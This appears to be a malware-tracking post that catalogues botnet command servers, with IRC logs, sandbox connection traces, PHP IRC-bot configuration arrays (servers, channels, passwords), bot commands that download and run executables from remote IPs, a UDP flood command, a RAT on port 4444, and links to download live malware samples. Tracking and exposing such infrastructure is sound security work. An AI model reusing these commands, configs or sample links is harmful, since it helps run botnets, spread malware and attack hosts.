botnet C&C irc hahahaha.ishtiben.com DNS_TYPE_A 60.190.218.104 123.183.217.32 59.63.157.62 60.190.218.104:7196 Now talking in #! Topic is ‘.asc -S|.http http://194.28.44.208/new1.exe|.asc exp_all 25 5 0 -a -r -e|.asc exp_all 25 5 0 -b -r -e|.asc exp_all 20 5 0 -b|.asc exp_all 20 5 0 -c|.asc exp_all 10 5 0 -a|.r.getfile -S|.r.getfile http://194.28.44.208/m.exe C:xdx.exe 1 -s’ HKLMSOFTWAREMicrosoftWindowsCurrentVer!policiesExplorerRun Microsoft Driver
aminizakoycam.co.cc(botnet hosted in Turkey Engin Rencber)
Remote Host Port Number 178.162.158.138 6667 PASS timu 74.86.183.197 80 MODE USA|86530 -x+i JOIN #1 timu USERHOST USA|86530 PRIVMSG #1 :- download – Downloading URL: http://www.freeflow.in/am2.exe to: c:/am2.exe. – downloaded 96.5 KB to c:/am2.exe @ 96.5 KB/sec – opened c:/am2.exe NICK USA|86530 USER ppdqhcd 0 0 :USA|86530 NICK [USA|XP|539487] USER srmyidk * 0 :COMPUTERNAME infos
onlinedatingsecretfriends.com(gbot hosted in United States Austin Road Runner Holdco Llc)
folusho.com 67.222.55.143 127.0.0.1 127.0.0.1 hostinganddedic.com 188.72.230.129 searchmobilecode.com zonetf.com www.google.com 74.125.77.147 www.yahoo.com 87.248.122.122 Opened listening TCP connection on port: 62970 Outgoing connection to remote server: folusho.com TCP port 80 Outgoing connection to remote server: hostinganddedic.com TCP port 80 Outgoing connection to remote server: www.google.com TCP port 80 Outgoing connection to remote server: www.yahoo.com TCP port 80
25 mb exe samples
Another package with different malware, like fake antiviruses, banking trojans, etc. Download: http://85a5a935.goneviral.com
jkconstrutora1.com.br(spyeye hosted in Brazil Sao Paulo Comite Gestor Da Internet No Brasil)
Remote Host Port Number 187.17.96.104 80 The data identified by the following URLs was then requested from the remote web server: http://jkconstrutora1.com.br/hjyyy/b1.png http://jkconstrutora1.com.br/hjyyy/b2.png http://jkconstrutora1.com.br/bala/Funcoes.php http://jkconstrutora1.com.br/hjyyy/b3.png http://jkconstrutora1.com.br/hjyyy/b4.png exe file http://890019c0.linkbucks.com infos about hosting http://whois.domaintools.com/187.17.96.104
216.246.15.205(botnet hosted in United States Chicago Hostforweb Inc)
Remote Host Port Number 204.0.5.41 80 216.178.38.224 80 63.135.80.46 80 216.246.15.205 1866 PASS xxx NICK NEW-[USA|00|P|27138] USER XP-4150 * 0 :COMPUTERNAME MODE NEW-[USA|00|P|27138] -ix JOIN #!high! test PONG 22 MOTD infos about hosting: http://whois.domaintools.com/216.246.15.205
maffiaxl.nl(linux bots hosted in Netherlands Amsterdam Interambition.com B.vo
var $config = array("server"=>"donville.nl", "port"=>"6667", "pass"=>"", "prefix"=>"botnet", "maxrand"=>"8", "chan"=>"#vendas", "chan2"=>"#", "key"=>"1", "modes"=>"+p", "password"=>"tibia", "trigger"=>".", "hostauth"=>"*" / * Now talking in #vendas * [I]botnet06877175 (botnet4151471@Donville-40bc2c45.fyi.net) has joined #vendas * [I]botnet71459373 (botnet6754926@Donville-40bc2c45.fyi.net) has joined #vendas * [I]botnet26055411 (botnet7636246@fa912d.7ff894.125b3c.c32e93) has joined #vendas * [I]botnet50285451 (botnet1535464@fa912d.7ff894.125b3c.c32e93) has joined #vendas * [A]botnet98885167 (botnet6937716@58734c.4409b5.d85eb7.b503c1) has joined #vendas * [A]botnet71165626 (botnet6786395@58734c.4409b5.d85eb7.b503c1) has
122.155.8.127(linux bots hosted in Thailand Bangkok Cat Telecom Data Comm. Dept Idc Office)
var $config = array("server"=>"122.155.8.127", "port"=>"3306", "pass"=>"", "prefix"=>"[c4]", "maxrand"=>"4", "chan"=>"#mathzor", "chan2"=>"", "key"=>"puto", "modes"=>"+p", "password"=>"math", "trigger"=>".", "hostauth"=>"*" // * for any hostname (remember: /setvhost pucorp.org) Current local users: 4 Max: 410 Current global users: 4 Max: 410 * piratox (~piratox@46.102.241.XX) has joined #nogrod .user lol321 .info .udpflood 127.0.0.1 1 1 [ UdpFlood Started! ] [ UdpFlood Started!
184.106.189.63(linux bots hosted in United States San Antonio Slicehost)
var $config = array("server"=>"184.106.189.63", "port"=>"6667", "pass"=>"manis", "prefix"=>"virgin|", "maxrand"=>"5", "chan"=>"#indoflas", "chan2"=>"#invio", "key"=>"nademkra", "modes"=>"+q", "password"=>"manis", "trigger"=>".", "hostauth"=>"n.G.G.r.E.m.e.T" // * for any hostname (remember: /setvhost n.G.G.r.E.m.e.T ) infos about hosting: http://whois.domaintools.com/184.106.189.63
ke3.no-ip.org(american rat user from United States Carol Stream AT&T Internet Services)
ke3.no-ip.org 99.135.162.93 Outgoing connection to remote server: ke3.no-ip.org TCP port 4444 Outgoing connection to remote server: 192.168.1.50 TCP port 4444 Outgoing connection to remote server: ke3.no-ip.org TCP port 4444 exe file http://www.multiupload.com/4HDYGAW831 infos about hacker http://whois.domaintools.com/99.135.162.93